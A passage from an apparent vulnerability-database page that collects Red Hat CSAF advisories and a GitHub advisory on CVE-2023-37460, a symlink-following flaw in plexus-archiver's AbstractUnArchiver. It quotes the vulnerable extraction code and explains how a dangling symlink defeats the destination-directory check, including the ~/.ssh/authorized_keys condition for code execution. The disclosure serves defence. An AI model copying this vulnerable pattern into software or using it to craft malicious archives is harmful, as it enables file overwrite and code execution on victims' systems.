So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-10-26T10:05:45+00:00", "details": "For details on how to apply this update, which includes 
the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
rhsa-2023:6138
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6138", "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "WINDUPRULE-1038", "url": "https://issues.redhat.com/browse/WINDUPRULE-1038" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json" } ], "title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update", "tracking": { "current_release_date": "2025-01-06T20:02:11+00:00", "generator": { "date": "2025-01-06T20:02:11+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.5" } }, "id": "RHSA-2023:6138", "initial_release_date": "2023-10-26T10:05:45+00:00", "revision_history": [ { "date": 
"2023-10-26T10:05:45+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-10-26T10:05:45+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2025-01-06T20:02:11+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product": { "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_id": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_identification_helper": { "cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8" } } } ], "category": "product_family", "name": "Migration Toolkit for Runtimes" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. 
So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-10-26T10:05:45+00:00", "details": "For details on how to apply this update, which includes 
the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
RHSA-2023:6886
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6886", "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json" } ], "title": "Red Hat Security Advisory: plexus-archiver security update", "tracking": { "current_release_date": "2025-01-06T05:00:10+00:00", "generator": { "date": "2025-01-06T05:00:10+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.5" } }, "id": "RHSA-2023:6886", "initial_release_date": "2023-11-13T09:42:49+00:00", "revision_history": [ { "date": "2023-11-13T09:42:49+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-11-13T09:42:49+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2025-01-06T05:00:10+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux Client Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Client Optional (v. 
7)", "product_id": "7Client-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::client" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::computenode" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::server" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::workstation" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch" } } }, { "category": "product_version", "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_id": 
"plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 
7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 
7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Workstation-optional-7.9.Z" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). 
Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-11-13T09:42:49+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", 
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
ghsa-wh3p-fphp-9h2m
Vulnerability from github
Summary
Using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.
Description
When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist, the resolveFile() function returns the path of the symlink itself instead of its target. That path passes the verification meant to ensure the file is not extracted outside of the destination directory. Later, Files.newOutputStream(), which follows symlinks by default, writes the entry's content to the symlink's target.
Impact
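Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. The advisory data on this page lists versions before 4.8.0 as affected and 4.8.0 as the fixed version.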
Technical Details
In AbstractUnArchiver.java:
```java
// Excerpt as quoted by the advisory; "..." marks code the advisory left out.
// Review summary: the path that is validated (canonical form of targetFileName) and the
// path that is finally written (what Files.newOutputStream resolves) can differ when
// targetFileName is an existing symbolic link whose target does not exist.
protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream,
                            String entryName, final Date entryDate, final boolean isDirectory,
                            final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)
    throws IOException, ArchiverException
{
    ...
    // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...
    final File targetFileName = FileUtils.resolveFile( dir, entryName );

    // Make sure that the resolved path of the extracted file doesn't escape the destination directory
    // getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),
    // because "/opt/directory".startsWith("/opt/dir") would return false negative.
    // NOTE(review): this check trusts the canonical form of targetFileName. Per the advisory,
    // for a symlink whose target does not exist the canonical form is the link's own path,
    // which lies inside dir, so the check passes.
    Path canonicalDirPath = dir.getCanonicalFile().toPath();
    Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
    if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
    {
        throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
    }

    try
    {
        ...
        if ( !StringUtils.isEmpty( symlinkDestination ) )
        {
            // The entry is itself a symlink: it is created at the validated location.
            SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
        }
        else if ( isDirectory )
        {
            targetFileName.mkdirs();
        }
        else
        {
            // NOTE(review): Files.newOutputStream follows symbolic links by default (as the
            // advisory states), so when targetFileName is a symlink the content goes to the
            // link's target, not to the path that was validated above.
            try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
            {
                IOUtil.copy( compressedInputStream, out );
            }
        }

        targetFileName.setLastModified( entryDate.getTime() );

        if ( !isIgnorePermissions() && mode != null && !isDirectory )
        {
            ArchiveEntryUtils.chmod( targetFileName, mode );
        }
    }
    catch ( final FileNotFoundException ex )
    {
        // Only FileNotFoundException is handled here, and only by logging a warning;
        // the method signature lets other IOExceptions propagate to the caller.
        getLogger().warn( "Unable to expand to file " + targetFileName.getPath() );
    }
}
```
When given an entry that already exists in dir as a symbolic link whose target does not exist, the symbolic link’s target will be created and the content of the archive’s entry will be written to it.
